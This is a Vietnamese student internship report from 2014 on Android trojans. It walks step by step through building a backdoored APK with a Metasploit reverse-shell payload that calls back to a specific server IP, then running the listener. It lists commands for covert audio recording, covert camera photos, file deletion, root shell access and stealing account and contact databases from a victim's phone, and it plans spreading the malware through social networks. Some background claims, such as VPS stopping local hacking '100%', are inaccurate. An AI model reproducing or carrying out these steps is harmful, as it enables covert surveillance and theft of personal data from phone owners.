Embed Size (px)
Citation preview
BÁO CÁO THỰC TẬP
September 7, 2014
Page 1
BÁO CÁO ĐỀ TÀI THỰC TẬP
ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP, SẮP
XẾP DỮ LIỆU NHƯ DANH BẠ, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG
ANDROID VÀ GỬI RA NGOÀI.
GIÁO VIÊN HƯỚNG DẪN: THẦY VÕ ĐỖ THẮNG
SINH VIÊN THỰC HIỆN: PHAN LÝ TRÚC ANH
BÁO CÁO TUẦN 6 - 7 (25/08/2014 – 07/09/2014)
BÁO CÁO THỰC TẬP
September 7, 2014
Page 2
Nội dung:
1. Tên đề tài: Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu
như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra
ngoài.
2. Yêu cầu:
Phần 1: Thực hiện đối với mạng LAN (có kết nối wifi)
1.1 Nghiên cứu hệ điều hành Kali Linux. Cài đặt Kali Linux (hoặc Back Track)
1.2 Nghiên cứu cơ chế tạo mã độc trên Kali Linux nói riêng và Android nói
chung.
1.3 Nghiên cứu cách tích hợp mã độc vào các phần mềm và quảng bá qua
mạng xã hội.
1.4 Thực hiện khai thác data trong thẻ sd card, camera của smartphone.
Phần 2: Thực hiện trên môi trường Virtual Private Server – VPS (server có
internet)
2.1 Cài đặt autosploit trên VPS
2.2 Tạo mã độc trên VPS
2.3 Cho phép xâm nhập vào android1, android2, android3… gửi data từ các
android về VPS
BÁO CÁO THỰC TẬP
September 7, 2014
Page 3
I – KẾT NỐI MÁY CHỦ ẢO VPS
1. Giới thiệu máy chủ ảo VPS:
- Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ
vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì
có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con
số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.
- Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn
quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn
chế 100% khả năng bị hack local.
- Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài
nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh
hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản trên
VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường.
- VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn
nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi
hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,…
2. Đặc điểm của VPS:
- Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung
lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành
riêng.
- Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
- Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng
dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web
bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao…
- Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên
mà không cần phải khởi động lại hệ thống.
- Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
3. Giá trị khi sử dụng VPS:
- Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS
phù hợp.
- Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.
- Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.
- Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.
- Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
BÁO CÁO THỰC TẬP
September 7, 2014
Page 4
4. Kết nối VPS:
- Đối với máy hệ điều hành Windows, để có thể kết nối với máy chủ ảo VPS, ta cần
sử dụng ứng dụng Remote Desktop Connection.
- Để khởi động ứng dụng RDC này, ta chỉ cần vào Start > All Programs >
Accessories > Remote Desktop Connection
- Sau đó ta cần nhập vào Địa chỉ IP, Username và Password được cung cấp khi ta
đăng ký tài khoản VPS.
- Như vậy là ta đã có thể kết nối với máy chủ ảo VPS.
II – CÀI ĐẶT METASPLOIT TRÊN VPS
Sau khi đã kết nối được máy VPS bằng quyền Administrator, ta tiến hành
tải và cài đặt phần mềm Metasploit để phục vụ cho việc tấn công điện thoại
Android
1. Giới thiệu về phần mềm Metasploit:
- Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm
tra, tấn công và khai thác lỗi của các service.
- Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những
components được viết bằng C, Assembler, và Python.
- Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.
2. Giới thiệu payload Meterpreter:
- Meterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong
Metasploit framework.
- Muc đích của Meterpreter là để cung cấp những tập lệnh để khai thác, tấn câng
các máy remote computers. Nó được viết từ các developers dưới dạng shared
object( DLL) files.
- Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn
không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống
virus.
- Trong bài viết này, để tấn công vào điện thoại Android thì ta sẽ sử dụng payload
Meterpreter này.
3. Cài đặt Metasploit:
Bước 1: Tải Metasploit bản mới nhất từ trang chủ www.metasploit.com hoặc trang
download http://www.rapid7.com/products/metasploit/download.jsp . Ta sử dụng
bản Community.
BÁO CÁO THỰC TẬP
September 7, 2014
Page 5
Bước 2: Tiến hành đăng ký để tải Metasploit
Sau khi đăng ký, ta có thể tải về. Và ta nhận được 1 mail có chứa Key để
Active Metasploit sau khi cài đặt. Mail này gửi về địa chỉ Email mà bạn đã đăng
ký.
Bước 3: Cài đặt phần mềm qua file đã tải về
- Chọn thư mục cài đặt
- Chọn Port của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790
- Chọn server và ngày hết hạn, để mặc định.
- Nhấp Next và Metasploit sẽ được cài đặt vào thư mục đã chọn
- Nhấp Finish và truy cập đến giao diện web của chương trình
BÁO CÁO THỰC TẬP
September 7, 2014
Page 6
Bước 4: Active phần mềm Metasploit bằng cách truy cập vào link
https://localhost:3790/
Tạo một tài khoản sử dụng:
Nhập Key đã nhận từ email:
Chọn ACTIVATE LICENSE
Bước 5: Khởi động Metasploit bằng cách vào Start > Progams > Metasploit >
Metasploit Console
III – TẤN CÔNG ĐIỆN THOẠI ANDROID TỪ MÁY VPS
1. Tạo ứng dụng chứa mã độc trên Kali Linux:
Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại Android
Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal.
Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter:
“msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS>
lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>”
BÁO CÁO THỰC TẬP
September 7, 2014
Page 7
Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162
lport=4444 R> /root/Desktop/hack.apk
2. Tấn công điện thoại Android:
Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể
mất vài chục phút.
Bước 2: Tiến hành thiết đặt payload bằng các lệnh
“ use exploit/multi/handler ”
“ set payload android/meterpreter/reverse_tcp ”
“ set lhost 14.0.21.162 ”
“ set lport 4444 ”
“ run ”
Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở
trên.
Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy
Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận
được thông báo như sau:
Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác
3. Các phương thức tấn công được sử dụng:
Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân.
a. Ghi âm lén:
Sử dụng lệnh: “ record_mic <số giây ghi âm> ”
BÁO CÁO THỰC TẬP
September 7, 2014
Page 8
b. Sử dụng camera:
Xem danh sách webcam của thiết bị: “ webcam_list ”
Chụp ảnh lén: “webcam_snap <mã camera>”
c. Tải và xóa file bất kỳ từ bộ nhớ sdcard:
Di chuyển vào thư mục bằng lệnh: cd
Tải về bằng lệnh: download <tên file>
Xóa tập tin bằng lệnh: rm <tên file>
d. Truy cập trực tiếp vào hệ thống:
Truy cập vào hệ thống bằng lệnh: “shell” > “su”
Kiểm tra máy đã root hay chưa bằng lệnh: “whoami”
Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể
tiếp tục tấn công.
BÁO CÁO THỰC TẬP
September 7, 2014
Page 9
e. Truy cập và khai thác tài khoản người dùng:
Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l”
Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
Trở về meterpreter và tải file accounts.db về:
BÁO CÁO THỰC TẬP
September 7, 2014
Page 10
Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db
f. Truy cập và đánh cắp danh bạ điện thoại:
Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại:
“cd /data/data/com.android.providers.contacts/databases”
Copy về thẻ sdcard và tải về máy
BÁO CÁO THỰC TẬP
September 7, 2014
Page 11
Xem nội dung của contacts2.db bằng SQLite Manager
BÁO CÁO THỰC TẬP
September 7, 2014
Page 12
g. Một số câu lệnh khác:
- Để biết thêm về các lệnh có thể thực hiện ta dùng help
- Để xem thông tin về máy, nhập lệnh sysinfo
- Để xem các tác vụ đang chạy gõ ps
- Xem ip của máy bị hack ta gõ ipconfig
- Xem danh sách thư mục, file gõ ls
- Để upload gõ lệnh upload
- ls -l danh mục file và các quyền
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA
/DATA/APP
/DATA/SYSTEM
/DATA/SYSTEM/accounts.db
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
BÁO CÁO THỰC TẬP
September 7, 2014
Page 13
- Để xem danh sách và down load các file hay thay đổi các file trong ROM
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
Ctrl + C để quay lại
